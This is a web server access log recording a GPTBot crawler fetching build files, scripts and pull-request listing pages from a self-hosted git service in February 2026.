"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:45:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43111] [Gzip 19.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:45:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:45:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:45:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43113] [Gzip 19.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:45:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:45:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9988] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:45:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9987] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:45:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:17:45:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:17:45:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11059] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:17:45:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9988] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:17:45:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21750] [Gzip 28.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:17:45:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21748] [Gzip 28.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:17:45:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:17:45:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10809] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:17:45:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10811] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:17:45:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10809] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:17:45:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:17:45:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:17:45:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:17:45:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:17:45:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9986] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:17:45:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21750] [Gzip 28.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:17:45:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11008] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/Makefile" -[17/Feb/2026:17:45:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/Makefile" -[17/Feb/2026:17:45:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/honeywell-logo.svg?display=source" [Client 74.7.227.38] [Length 14218] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:17:45:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/honeywell-logo.svg?display=rendered" [Client 74.7.227.38] [Length 11181] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:17:45:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:45:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 10989] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:17:45:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11015] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:17:45:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11015] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:17:45:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11015] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:17:45:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11016] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:17:45:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:45:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:45:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/BuildTip.txt?display=rendered" [Client 74.7.227.38] [Length 11129] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/BuildTip.txt" -[17/Feb/2026:17:45:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=PythonTest" [Client 74.7.227.38] [Length 50452] [Gzip 8.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest" -[17/Feb/2026:17:45:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:45:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:17:45:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:17:45:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:45:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py.old?display=rendered" [Client 74.7.227.38] [Length 10937] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py.old" -[17/Feb/2026:17:45:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.py?display=rendered" [Client 74.7.227.38] [Length 10891] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.py" -[17/Feb/2026:17:45:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_Final.spec?display=source" [Client 74.7.227.38] [Length 12507] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_Final.spec" -[17/Feb/2026:17:45:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.spec?display=source" [Client 74.7.227.38] [Length 12259] [Gzip 3.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.spec" -[17/Feb/2026:17:45:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2fobj%2fDebug%2fnet8.0%2fOpcConnectionTest.assets.cache" [Client 74.7.227.38] [Length 20644] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" -[17/Feb/2026:17:45:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/labels?sort=mostissues&state=" [Client 74.7.227.38] [Length 7651] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/labels" -[17/Feb/2026:17:45:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/logger.hpp?display=rendered" [Client 74.7.227.38] [Length 11078] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:17:45:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr 